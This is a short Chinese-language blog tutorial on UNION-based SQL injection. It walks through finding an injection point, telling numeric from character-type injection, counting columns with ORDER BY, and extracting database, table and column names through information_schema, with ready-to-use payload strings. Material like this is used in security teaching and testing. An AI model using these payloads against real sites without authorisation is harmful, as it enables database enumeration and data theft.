sql注入之union注入
2024-09-08 01:44:45
联合查询注入利用的前提: 必须要有回显
联合查询过程:
- 判断是否存在注入点
- 判断是什么类型注入(字符型or数字型)
- 判断闭合方式
- 查询列数个数(order by)
5, 获得数据库名 - 获得表名
- 获得字段名
1. 判断是否存在注入点 可以用(')单引号显示数据库错误信息或者页面回显不同
2. 判断什么类型(字符型or数字型) 用and 1=1和and 1=2 如果页面没有变化说明不是数字型 ,如果有明显变化说明是数字型
3. 判断闭合方式 单引号or双引号..看报错信息、
4. 判断列数个数(order by) order by在mysql中查询结果是按照指定字段进行排序的,例如数据库中有3个字段,order by查询就是1,2,3
5. 查看数据库信息and获得数据库名 使用group_concat()
基本语句:
1' union select 1,(select database()),3--+
1' union select 1,(select group_concat(schema_name) from information_schema.schemata) --+
6. 获得表名
基本语句:
0' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+
7. 获得字段名
基本语句:
0' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='表名'),3 --+最新文章
- [LeetCode] Best Time to Buy and Sell Stock 买卖股票的最佳时间
- jQuery 事件方法
- 【JavaScript忍者秘籍】定时器
- mac 终端启动 jboss 停留在(Starting) 不能启动joss
- JsRender实用教程(tag else使用、循环嵌套访问父级数据)
- OpenCV学习笔记:MAT解析
- 20160408javaweb之JDBC ---PreparedStatement
- bithrtree
- prim模板题
- LSH、ITQ、SKLSH图像检索实验实现(包含源码下载地址)
- swift http请求返回json数据和分析
- POJ 1742 Coins ( 单调队列解法 )
- 使用D3 Geo模块画澳大利亚地图
- [epub] epub.js的ePubReader函数报URI malformed错误的解决办法
- 【RabbitMQ系列】队列、绑定、交换器
- 实体类双向映射进行Json序列化时出现无限循环的解决问题
- (1)编译安装lamp三部曲之apache-技术流ken
- python 开发环境配置
- thinkphp设置默认访问的模块
- CPUFreq驱动